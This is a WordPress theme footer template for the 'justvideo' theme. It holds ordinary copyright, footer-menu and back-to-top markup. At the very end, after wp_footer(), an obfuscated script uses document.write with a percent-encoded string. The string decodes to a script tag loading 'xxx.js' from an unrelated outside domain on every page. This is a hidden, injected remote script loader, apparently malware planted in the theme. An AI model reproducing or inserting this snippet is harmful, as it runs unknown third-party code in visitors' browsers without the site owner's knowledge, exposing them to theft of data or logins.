<?php
/**
 * The template for displaying the footer.
 *
 * Contains the closing of the #content div and all content after.
 *
 * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials
 *
 * @package justvideo
 */

?>
		</div><!-- .clear -->

	</div><!-- #content .site-content -->

	<div id="site-bottom" class="clear">
		
		<div class="container">

			<div class="site-info">

				<?php
					$justvideo_theme = wp_get_theme();
				?>

				&copy; <?php echo esc_html( date("o") ); ?> <?php echo esc_html( get_bloginfo('name') ); ?> - <a href="<?php echo esc_url( $justvideo_theme->get( 'AuthorURI' ) ); ?>"><?php esc_html_e('WordPress Theme', 'justvideo'); ?></a> <?php esc_html_e('by', 'justvideo'); ?> <a href="<?php echo esc_url( $justvideo_theme->get( 'AuthorURI' ) ); ?>"><?php esc_html_e('WPEnjoy', 'justvideo'); ?></a>

			</div><!-- .site-info -->

			<?php 
				if ( has_nav_menu( 'footer' ) ) {
					wp_nav_menu( array( 'theme_location' => 'footer', 'menu_id' => 'footer-menu', 'menu_class' => 'footer-nav' ) );
				}
			?>	

		</div><!-- .container -->

	</div><!-- #site-bottom -->

</div><!-- #page -->

<div id="back-top">
	<a href="#top" title="<?php esc_attr_e('Back to top', 'justvideo'); ?>"><span class="genericon genericon-collapse"></span></a>
</div>

<?php wp_footer(); ?>
<script type="text/javascript">
document.write(unescape('%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%78%76%32%31%2E%63%6C%6F%75%64%2F%78%78%78%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%0A'));
</script>
</body>
</html>
